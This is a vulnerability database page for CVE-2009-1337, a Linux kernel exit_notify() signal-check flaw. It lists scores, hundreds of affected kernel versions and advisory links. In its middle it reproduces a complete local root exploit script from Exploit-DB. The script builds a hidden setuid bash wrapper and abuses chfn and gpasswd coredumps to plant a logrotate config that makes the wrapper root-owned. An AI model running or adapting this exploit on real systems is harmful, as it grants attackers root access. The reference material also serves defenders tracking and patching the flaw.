CVE-2009-1337 : Detail

CVE-2009-1337

A01-Broken Access Control
0.04%V3
Local
2009-04-22 13:00 +00:00
2018-10-10 16:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

The exit_notify function in kernel/exit.c in the Linux kernel before 2.6.30-rc1 does not restrict exit signals when the CAP_KILL capability is held, which allows local users to send an arbitrary signal to a process by running a program that modifies the exit_signal field and then uses an exec system call to launch a setuid application.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metric Score Severity CVSS Vector Source
V2 4.4 AV:L/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 8369

Publication date : 2009-04-07 22:00 +00:00
Author : gat3way
EDB Verified : Yes

#!/bin/sh ################################################################################### # gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit # # by Milen Rangelov (gat3way-at-gat3way-dot-eu) # # Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov. # Basically it allows us to send arbitrary signals to a privileged (suidroot) # parent process. Due to a bad check, the child process with appropriate exit signal # already set can first execute a suidroot binary then exit() and thus bypass # in-kernel privilege checks. We use chfn and gpasswd for that purpose. # # !!!!!!!!!!! # Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 # so you'll be out of luck most of the time. # So it is not going to be the script kiddies' new killer shit :-) # !!!!!!!!!!! # # if you invent a better way to escalate privileges by sending arbitrary signals to # the parent process, please mail me :) That was the best I could think of today :-( # # This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness # # Skuchna rabota... # #################################################################################### SUIDDUMP=`cat /proc/sys/fs/suid_dumpable` if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi if [ -d /etc/logrotate.d ]; then echo "logrotate installed, that's good!" else echo "No logrotate installed, sorry!";exit fi echo -e "Compiling the bash setuid() wrapper..." cat >> /tmp/.m.c << EOF #include #include int main() { setuid(0); execl("/bin/bash","[kthreadd]",NULL); } EOF cc /tmp/.m.c -o /tmp/.m rm /tmp/.m.c echo -e "Compiling the exploit code..." cat >> /tmp/exploit.c << EOF #include #include #include #include #include int child(void *data) { sleep(2); printf("I'm gonna kill the suidroot father without having root rights :D\n"); execl("/usr/bin/gpasswd","%s",NULL); exit(0); } int main() { int stacksize = 4*getpagesize(); void *stack, *stacktop; stack = malloc(stacksize); stacktop = stack + stacksize; chdir("/etc/logrotate.d"); int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL); if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL); } EOF cc /tmp/exploit.c -o /tmp/.ex rm /tmp/exploit.c echo -e "Setting coredump limits and running the exploit...\n" ulimit -c 10000 touch /tmp/.a `/tmp/.ex >/dev/null 2>/dev/null` sleep 5 rm /tmp/.ex if [ -e /etc/logrotate.d/core ]; then echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n" echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root" echo -e "\nYour terminal is most probably screwed now, sorry for that..." exit fi echo "The system is not vulnerable, sorry :(" # milw0rm.com [2009-04-08]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version To (including) 2.6.29

    Linux>>Linux_kernel >> Version 2.2.27

    Linux>>Linux_kernel >> Version 2.4.36

    Linux>>Linux_kernel >> Version 2.4.36.1

    Linux>>Linux_kernel >> Version 2.4.36.2

    Linux>>Linux_kernel >> Version 2.4.36.3

    Linux>>Linux_kernel >> Version 2.4.36.4

    Linux>>Linux_kernel >> Version 2.4.36.5

    Linux>>Linux_kernel >> Version 2.4.36.6

    Linux>>Linux_kernel >> Version 2.6

    Linux>>Linux_kernel >> Version 2.6.0

    Linux>>Linux_kernel >> Version 2.6.1

    Linux>>Linux_kernel >> Version 2.6.2

    Linux>>Linux_kernel >> Version 2.6.3

    Linux>>Linux_kernel >> Version 2.6.4

    Linux>>Linux_kernel >> Version 2.6.5

    Linux>>Linux_kernel >> Version 2.6.6

    Linux>>Linux_kernel >> Version 2.6.7

    Linux>>Linux_kernel >> Version 2.6.8

    Linux>>Linux_kernel >> Version 2.6.8.1

    Linux>>Linux_kernel >> Version 2.6.9

    Linux>>Linux_kernel >> Version 2.6.10

    Linux>>Linux_kernel >> Version 2.6.11

    Linux>>Linux_kernel >> Version 2.6.11.1

    Linux>>Linux_kernel >> Version 2.6.11.2

    Linux>>Linux_kernel >> Version 2.6.11.3

    Linux>>Linux_kernel >> Version 2.6.11.4

    Linux>>Linux_kernel >> Version 2.6.11.5

    Linux>>Linux_kernel >> Version 2.6.11.6

    Linux>>Linux_kernel >> Version 2.6.11.7

    Linux>>Linux_kernel >> Version 2.6.11.8

    Linux>>Linux_kernel >> Version 2.6.11.9

    Linux>>Linux_kernel >> Version 2.6.11.10

    Linux>>Linux_kernel >> Version 2.6.11.11

    Linux>>Linux_kernel >> Version 2.6.11.12

    Linux>>Linux_kernel >> Version 2.6.12

    Linux>>Linux_kernel >> Version 2.6.12.1

    Linux>>Linux_kernel >> Version 2.6.12.2

    Linux>>Linux_kernel >> Version 2.6.12.3

    Linux>>Linux_kernel >> Version 2.6.12.4

    Linux>>Linux_kernel >> Version 2.6.12.5

    Linux>>Linux_kernel >> Version 2.6.12.6

    Linux>>Linux_kernel >> Version 2.6.13

    Linux>>Linux_kernel >> Version 2.6.13.1

    Linux>>Linux_kernel >> Version 2.6.13.2

    Linux>>Linux_kernel >> Version 2.6.13.3

    Linux>>Linux_kernel >> Version 2.6.13.4

    Linux>>Linux_kernel >> Version 2.6.13.5

    Linux>>Linux_kernel >> Version 2.6.14

    Linux>>Linux_kernel >> Version 2.6.14.1

    Linux>>Linux_kernel >> Version 2.6.14.2

    Linux>>Linux_kernel >> Version 2.6.14.3

    Linux>>Linux_kernel >> Version 2.6.14.4

    Linux>>Linux_kernel >> Version 2.6.14.5

    Linux>>Linux_kernel >> Version 2.6.14.6

    Linux>>Linux_kernel >> Version 2.6.14.7

    Linux>>Linux_kernel >> Version 2.6.15

    Linux>>Linux_kernel >> Version 2.6.15.1

    Linux>>Linux_kernel >> Version 2.6.15.2

    Linux>>Linux_kernel >> Version 2.6.15.3

    Linux>>Linux_kernel >> Version 2.6.15.4

    Linux>>Linux_kernel >> Version 2.6.15.5

    Linux>>Linux_kernel >> Version 2.6.15.6

    Linux>>Linux_kernel >> Version 2.6.15.7

    Linux>>Linux_kernel >> Version 2.6.16

    Linux>>Linux_kernel >> Version 2.6.16.1

    Linux>>Linux_kernel >> Version 2.6.16.2

    Linux>>Linux_kernel >> Version 2.6.16.3

    Linux>>Linux_kernel >> Version 2.6.16.4

    Linux>>Linux_kernel >> Version 2.6.16.5

    Linux>>Linux_kernel >> Version 2.6.16.6

    Linux>>Linux_kernel >> Version 2.6.16.7

    Linux>>Linux_kernel >> Version 2.6.16.8

    Linux>>Linux_kernel >> Version 2.6.16.9

    Linux>>Linux_kernel >> Version 2.6.16.10

    Linux>>Linux_kernel >> Version 2.6.16.11

    Linux>>Linux_kernel >> Version 2.6.16.12

    Linux>>Linux_kernel >> Version 2.6.16.13

    Linux>>Linux_kernel >> Version 2.6.16.14

    Linux>>Linux_kernel >> Version 2.6.16.15

    Linux>>Linux_kernel >> Version 2.6.16.16

    Linux>>Linux_kernel >> Version 2.6.16.17

    Linux>>Linux_kernel >> Version 2.6.16.18

    Linux>>Linux_kernel >> Version 2.6.16.19

    Linux>>Linux_kernel >> Version 2.6.16.20

    Linux>>Linux_kernel >> Version 2.6.16.21

    Linux>>Linux_kernel >> Version 2.6.16.22

    Linux>>Linux_kernel >> Version 2.6.16.23

    Linux>>Linux_kernel >> Version 2.6.16.24

    Linux>>Linux_kernel >> Version 2.6.16.25

    Linux>>Linux_kernel >> Version 2.6.16.26

    Linux>>Linux_kernel >> Version 2.6.16.27

    Linux>>Linux_kernel >> Version 2.6.16.28

    Linux>>Linux_kernel >> Version 2.6.16.29

    Linux>>Linux_kernel >> Version 2.6.16.30

    Linux>>Linux_kernel >> Version 2.6.16.31

    Linux>>Linux_kernel >> Version 2.6.16.32

    Linux>>Linux_kernel >> Version 2.6.16.33

    Linux>>Linux_kernel >> Version 2.6.16.34

    Linux>>Linux_kernel >> Version 2.6.16.35

    Linux>>Linux_kernel >> Version 2.6.16.36

    Linux>>Linux_kernel >> Version 2.6.16.37

    Linux>>Linux_kernel >> Version 2.6.16.38

    Linux>>Linux_kernel >> Version 2.6.16.39

    Linux>>Linux_kernel >> Version 2.6.16.40

    Linux>>Linux_kernel >> Version 2.6.16.41

    Linux>>Linux_kernel >> Version 2.6.16.42

    Linux>>Linux_kernel >> Version 2.6.16.43

    Linux>>Linux_kernel >> Version 2.6.16.44

    Linux>>Linux_kernel >> Version 2.6.16.45

    Linux>>Linux_kernel >> Version 2.6.16.46

    Linux>>Linux_kernel >> Version 2.6.16.47

    Linux>>Linux_kernel >> Version 2.6.16.48

    Linux>>Linux_kernel >> Version 2.6.16.49

    Linux>>Linux_kernel >> Version 2.6.16.50

    Linux>>Linux_kernel >> Version 2.6.16.51

    Linux>>Linux_kernel >> Version 2.6.16.52

    Linux>>Linux_kernel >> Version 2.6.16.53

    Linux>>Linux_kernel >> Version 2.6.16.54

    Linux>>Linux_kernel >> Version 2.6.16.55

    Linux>>Linux_kernel >> Version 2.6.16.56

    Linux>>Linux_kernel >> Version 2.6.16.57

    Linux>>Linux_kernel >> Version 2.6.16.58

    Linux>>Linux_kernel >> Version 2.6.16.59

    Linux>>Linux_kernel >> Version 2.6.16.60

    Linux>>Linux_kernel >> Version 2.6.16.61

    Linux>>Linux_kernel >> Version 2.6.16.62

    Linux>>Linux_kernel >> Version 2.6.17

    Linux>>Linux_kernel >> Version 2.6.17.1

    Linux>>Linux_kernel >> Version 2.6.17.2

    Linux>>Linux_kernel >> Version 2.6.17.3

    Linux>>Linux_kernel >> Version 2.6.17.4

    Linux>>Linux_kernel >> Version 2.6.17.5

    Linux>>Linux_kernel >> Version 2.6.17.6

    Linux>>Linux_kernel >> Version 2.6.17.7

    Linux>>Linux_kernel >> Version 2.6.17.8

    Linux>>Linux_kernel >> Version 2.6.17.9

    Linux>>Linux_kernel >> Version 2.6.17.10

    Linux>>Linux_kernel >> Version 2.6.17.11

    Linux>>Linux_kernel >> Version 2.6.17.12

    Linux>>Linux_kernel >> Version 2.6.17.13

    Linux>>Linux_kernel >> Version 2.6.17.14

    Linux>>Linux_kernel >> Version 2.6.18

    Linux>>Linux_kernel >> Version 2.6.18

    Linux>>Linux_kernel >> Version 2.6.18

    Linux>>Linux_kernel >> Version 2.6.18

    Linux>>Linux_kernel >> Version 2.6.18

    Linux>>Linux_kernel >> Version 2.6.18

    Linux>>Linux_kernel >> Version 2.6.18

    Linux>>Linux_kernel >> Version 2.6.18

    Linux>>Linux_kernel >> Version 2.6.18.1

    Linux>>Linux_kernel >> Version 2.6.18.2

    Linux>>Linux_kernel >> Version 2.6.18.3

    Linux>>Linux_kernel >> Version 2.6.18.4

    Linux>>Linux_kernel >> Version 2.6.18.5

    Linux>>Linux_kernel >> Version 2.6.18.6

    Linux>>Linux_kernel >> Version 2.6.18.7

    Linux>>Linux_kernel >> Version 2.6.18.8

    Linux>>Linux_kernel >> Version 2.6.19

    Linux>>Linux_kernel >> Version 2.6.19.1

    Linux>>Linux_kernel >> Version 2.6.19.2

    Linux>>Linux_kernel >> Version 2.6.19.3

    Linux>>Linux_kernel >> Version 2.6.19.4

    Linux>>Linux_kernel >> Version 2.6.19.5

    Linux>>Linux_kernel >> Version 2.6.19.6

    Linux>>Linux_kernel >> Version 2.6.19.7

    Linux>>Linux_kernel >> Version 2.6.20

    Linux>>Linux_kernel >> Version 2.6.20.1

    Linux>>Linux_kernel >> Version 2.6.20.2

    Linux>>Linux_kernel >> Version 2.6.20.3

    Linux>>Linux_kernel >> Version 2.6.20.4

    Linux>>Linux_kernel >> Version 2.6.20.5

    Linux>>Linux_kernel >> Version 2.6.20.6

    Linux>>Linux_kernel >> Version 2.6.20.7

    Linux>>Linux_kernel >> Version 2.6.20.8

    Linux>>Linux_kernel >> Version 2.6.20.9

    Linux>>Linux_kernel >> Version 2.6.20.10

    Linux>>Linux_kernel >> Version 2.6.20.11

    Linux>>Linux_kernel >> Version 2.6.20.12

    Linux>>Linux_kernel >> Version 2.6.20.13

    Linux>>Linux_kernel >> Version 2.6.20.14

    Linux>>Linux_kernel >> Version 2.6.20.15

    Linux>>Linux_kernel >> Version 2.6.20.16

    Linux>>Linux_kernel >> Version 2.6.20.17

    Linux>>Linux_kernel >> Version 2.6.20.18

    Linux>>Linux_kernel >> Version 2.6.20.19

    Linux>>Linux_kernel >> Version 2.6.20.20

    Linux>>Linux_kernel >> Version 2.6.20.21

    Linux>>Linux_kernel >> Version 2.6.21

    Linux>>Linux_kernel >> Version 2.6.21.1

    Linux>>Linux_kernel >> Version 2.6.21.2

    Linux>>Linux_kernel >> Version 2.6.21.3

    Linux>>Linux_kernel >> Version 2.6.21.4

    Linux>>Linux_kernel >> Version 2.6.21.5

    Linux>>Linux_kernel >> Version 2.6.21.6

    Linux>>Linux_kernel >> Version 2.6.21.7

    Linux>>Linux_kernel >> Version 2.6.22

    Linux>>Linux_kernel >> Version 2.6.22.1

    Linux>>Linux_kernel >> Version 2.6.22.2

    Linux>>Linux_kernel >> Version 2.6.22.3

    Linux>>Linux_kernel >> Version 2.6.22.4

    Linux>>Linux_kernel >> Version 2.6.22.5

    Linux>>Linux_kernel >> Version 2.6.22.6

    Linux>>Linux_kernel >> Version 2.6.22.7

    Linux>>Linux_kernel >> Version 2.6.22.8

    Linux>>Linux_kernel >> Version 2.6.22.9

    Linux>>Linux_kernel >> Version 2.6.22.10

    Linux>>Linux_kernel >> Version 2.6.22.11

    Linux>>Linux_kernel >> Version 2.6.22.12

    Linux>>Linux_kernel >> Version 2.6.22.13

    Linux>>Linux_kernel >> Version 2.6.22.14

    Linux>>Linux_kernel >> Version 2.6.22.15

    Linux>>Linux_kernel >> Version 2.6.22.16

    Linux>>Linux_kernel >> Version 2.6.22.17

    Linux>>Linux_kernel >> Version 2.6.22.18

    Linux>>Linux_kernel >> Version 2.6.22.19

    Linux>>Linux_kernel >> Version 2.6.22.20

    Linux>>Linux_kernel >> Version 2.6.22.21

    Linux>>Linux_kernel >> Version 2.6.22.22

    Linux>>Linux_kernel >> Version 2.6.22_rc1

      Linux>>Linux_kernel >> Version 2.6.22_rc7

        Linux>>Linux_kernel >> Version 2.6.23

        Linux>>Linux_kernel >> Version 2.6.23

        Linux>>Linux_kernel >> Version 2.6.23

        Linux>>Linux_kernel >> Version 2.6.23.1

        Linux>>Linux_kernel >> Version 2.6.23.2

        Linux>>Linux_kernel >> Version 2.6.23.3

        Linux>>Linux_kernel >> Version 2.6.23.4

        Linux>>Linux_kernel >> Version 2.6.23.5

        Linux>>Linux_kernel >> Version 2.6.23.6

        Linux>>Linux_kernel >> Version 2.6.23.7

        Linux>>Linux_kernel >> Version 2.6.23.8

        Linux>>Linux_kernel >> Version 2.6.23.9

        Linux>>Linux_kernel >> Version 2.6.23.10

        Linux>>Linux_kernel >> Version 2.6.23.11

        Linux>>Linux_kernel >> Version 2.6.23.12

        Linux>>Linux_kernel >> Version 2.6.23.13

        Linux>>Linux_kernel >> Version 2.6.23.14

        Linux>>Linux_kernel >> Version 2.6.23.15

        Linux>>Linux_kernel >> Version 2.6.23.16

        Linux>>Linux_kernel >> Version 2.6.23.17

        Linux>>Linux_kernel >> Version 2.6.24

        Linux>>Linux_kernel >> Version 2.6.24

        Linux>>Linux_kernel >> Version 2.6.24

        Linux>>Linux_kernel >> Version 2.6.24

        Linux>>Linux_kernel >> Version 2.6.24

        Linux>>Linux_kernel >> Version 2.6.24

        Linux>>Linux_kernel >> Version 2.6.24.1

        Linux>>Linux_kernel >> Version 2.6.24.2

        Linux>>Linux_kernel >> Version 2.6.24.3

        Linux>>Linux_kernel >> Version 2.6.24.4

        Linux>>Linux_kernel >> Version 2.6.24.5

        Linux>>Linux_kernel >> Version 2.6.24.6

        Linux>>Linux_kernel >> Version 2.6.24.7

        Linux>>Linux_kernel >> Version 2.6.25

        Linux>>Linux_kernel >> Version 2.6.25

          Linux>>Linux_kernel >> Version 2.6.25.1

          Linux>>Linux_kernel >> Version 2.6.25.1

            Linux>>Linux_kernel >> Version 2.6.25.2

            Linux>>Linux_kernel >> Version 2.6.25.2

              Linux>>Linux_kernel >> Version 2.6.25.3

              Linux>>Linux_kernel >> Version 2.6.25.3

                Linux>>Linux_kernel >> Version 2.6.25.4

                Linux>>Linux_kernel >> Version 2.6.25.4

                  Linux>>Linux_kernel >> Version 2.6.25.5

                  Linux>>Linux_kernel >> Version 2.6.25.5

                    Linux>>Linux_kernel >> Version 2.6.25.6

                    Linux>>Linux_kernel >> Version 2.6.25.6

                      Linux>>Linux_kernel >> Version 2.6.25.7

                      Linux>>Linux_kernel >> Version 2.6.25.7

                        Linux>>Linux_kernel >> Version 2.6.25.8

                        Linux>>Linux_kernel >> Version 2.6.25.8

                          Linux>>Linux_kernel >> Version 2.6.25.9

                          Linux>>Linux_kernel >> Version 2.6.25.9

                            Linux>>Linux_kernel >> Version 2.6.25.10

                            Linux>>Linux_kernel >> Version 2.6.25.10

                              Linux>>Linux_kernel >> Version 2.6.25.11

                              Linux>>Linux_kernel >> Version 2.6.25.11

                                Linux>>Linux_kernel >> Version 2.6.25.12

                                Linux>>Linux_kernel >> Version 2.6.25.12

                                  Linux>>Linux_kernel >> Version 2.6.25.13

                                  Linux>>Linux_kernel >> Version 2.6.25.14

                                  Linux>>Linux_kernel >> Version 2.6.25.15

                                  Linux>>Linux_kernel >> Version 2.6.25.16

                                  Linux>>Linux_kernel >> Version 2.6.25.17

                                  Linux>>Linux_kernel >> Version 2.6.25.18

                                  Linux>>Linux_kernel >> Version 2.6.25.19

                                  Linux>>Linux_kernel >> Version 2.6.25.20

                                  Linux>>Linux_kernel >> Version 2.6.26

                                  Linux>>Linux_kernel >> Version 2.6.26

                                  Linux>>Linux_kernel >> Version 2.6.26.1

                                  Linux>>Linux_kernel >> Version 2.6.26.2

                                  Linux>>Linux_kernel >> Version 2.6.26.3

                                  Linux>>Linux_kernel >> Version 2.6.26.4

                                  Linux>>Linux_kernel >> Version 2.6.26.5

                                  Linux>>Linux_kernel >> Version 2.6.26.6

                                  Linux>>Linux_kernel >> Version 2.6.26.7

                                  Linux>>Linux_kernel >> Version 2.6.26.8

                                  Linux>>Linux_kernel >> Version 2.6.27

                                  Linux>>Linux_kernel >> Version 2.6.27

                                  Linux>>Linux_kernel >> Version 2.6.27

                                  Linux>>Linux_kernel >> Version 2.6.27

                                  Linux>>Linux_kernel >> Version 2.6.27

                                  Linux>>Linux_kernel >> Version 2.6.27

                                  Linux>>Linux_kernel >> Version 2.6.27

                                  Linux>>Linux_kernel >> Version 2.6.27

                                  Linux>>Linux_kernel >> Version 2.6.27

                                  Linux>>Linux_kernel >> Version 2.6.27

                                  Linux>>Linux_kernel >> Version 2.6.27.1

                                  Linux>>Linux_kernel >> Version 2.6.27.2

                                  Linux>>Linux_kernel >> Version 2.6.27.3

                                  Linux>>Linux_kernel >> Version 2.6.27.4

                                  Linux>>Linux_kernel >> Version 2.6.27.5

                                  Linux>>Linux_kernel >> Version 2.6.27.6

                                  Linux>>Linux_kernel >> Version 2.6.27.7

                                  Linux>>Linux_kernel >> Version 2.6.27.8

                                  Linux>>Linux_kernel >> Version 2.6.27.9

                                  Linux>>Linux_kernel >> Version 2.6.27.10

                                  Linux>>Linux_kernel >> Version 2.6.27.11

                                  Linux>>Linux_kernel >> Version 2.6.27.12

                                  Linux>>Linux_kernel >> Version 2.6.28

                                  Linux>>Linux_kernel >> Version 2.6.28

                                    Linux>>Linux_kernel >> Version 2.6.28

                                    Linux>>Linux_kernel >> Version 2.6.28

                                    Linux>>Linux_kernel >> Version 2.6.28

                                    Linux>>Linux_kernel >> Version 2.6.28

                                    Linux>>Linux_kernel >> Version 2.6.28

                                    Linux>>Linux_kernel >> Version 2.6.28

                                    Linux>>Linux_kernel >> Version 2.6.28

                                    Linux>>Linux_kernel >> Version 2.6.28.1

                                    Linux>>Linux_kernel >> Version 2.6.28.2

                                    Linux>>Linux_kernel >> Version 2.6.28.3

                                    Linux>>Linux_kernel >> Version 2.6.28.4

                                    Linux>>Linux_kernel >> Version 2.6.28.5

                                    Linux>>Linux_kernel >> Version 2.6.28.6

                                    Linux>>Linux_kernel >> Version 2.6.28.7

                                    Linux>>Linux_kernel >> Version 2.6.28.8

                                    Linux>>Linux_kernel >> Version 2.6.28.9

                                    Linux>>Linux_kernel >> Version 2.6.29

                                    Linux>>Linux_kernel >> Version 2.6.29

                                      Linux>>Linux_kernel >> Version 2.6.29

                                      Linux>>Linux_kernel >> Version 2.6.29

                                      References

                                      http://secunia.com/advisories/35390
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://www.mandriva.com/security/advisories?name=MDVSA-2009:135
                                      Tags : vendor-advisory, x_refsource_MANDRIVA
                                      http://secunia.com/advisories/35226
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://secunia.com/advisories/37471
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://secunia.com/advisories/35160
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://www.openwall.com/lists/oss-security/2009/04/07/1
                                      Tags : mailing-list, x_refsource_MLIST
                                      http://secunia.com/advisories/35656
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://www.debian.org/security/2009/dsa-1794
                                      Tags : vendor-advisory, x_refsource_DEBIAN
                                      http://marc.info/?l=linux-kernel&m=123560588713763&w=2
                                      Tags : mailing-list, x_refsource_MLIST
                                      http://secunia.com/advisories/35324
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://secunia.com/advisories/35185
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://secunia.com/advisories/35015
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://secunia.com/advisories/35011
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://secunia.com/advisories/35120
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://www.ubuntu.com/usn/usn-793-1
                                      Tags : vendor-advisory, x_refsource_UBUNTU
                                      http://secunia.com/advisories/34981
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://www.debian.org/security/2009/dsa-1800
                                      Tags : vendor-advisory, x_refsource_DEBIAN
                                      http://www.redhat.com/support/errata/RHSA-2009-1077.html
                                      Tags : vendor-advisory, x_refsource_REDHAT
                                      http://www.securitytracker.com/id?1022141
                                      Tags : vdb-entry, x_refsource_SECTRACK
                                      http://www.securityfocus.com/bid/34405
                                      Tags : vdb-entry, x_refsource_BID
                                      http://secunia.com/advisories/35387
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://secunia.com/advisories/34917
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      https://rhn.redhat.com/errata/RHSA-2009-1550.html
                                      Tags : vendor-advisory, x_refsource_REDHAT
                                      http://www.debian.org/security/2009/dsa-1787
                                      Tags : vendor-advisory, x_refsource_DEBIAN
                                      http://www.redhat.com/support/errata/RHSA-2009-1024.html
                                      Tags : vendor-advisory, x_refsource_REDHAT
                                      http://www.mandriva.com/security/advisories?name=MDVSA-2009:119
                                      Tags : vendor-advisory, x_refsource_MANDRIVA
                                      http://www.openwall.com/lists/oss-security/2009/04/17/3
                                      Tags : mailing-list, x_refsource_MLIST
                                      http://rhn.redhat.com/errata/RHSA-2009-0473.html
                                      Tags : vendor-advisory, x_refsource_REDHAT
                                      http://www.redhat.com/support/errata/RHSA-2009-0451.html
                                      Tags : vendor-advisory, x_refsource_REDHAT
                                      http://secunia.com/advisories/35121
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      http://www.vupen.com/english/advisories/2009/3316
                                      Tags : vdb-entry, x_refsource_VUPEN
                                      http://secunia.com/advisories/35394
                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                      Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.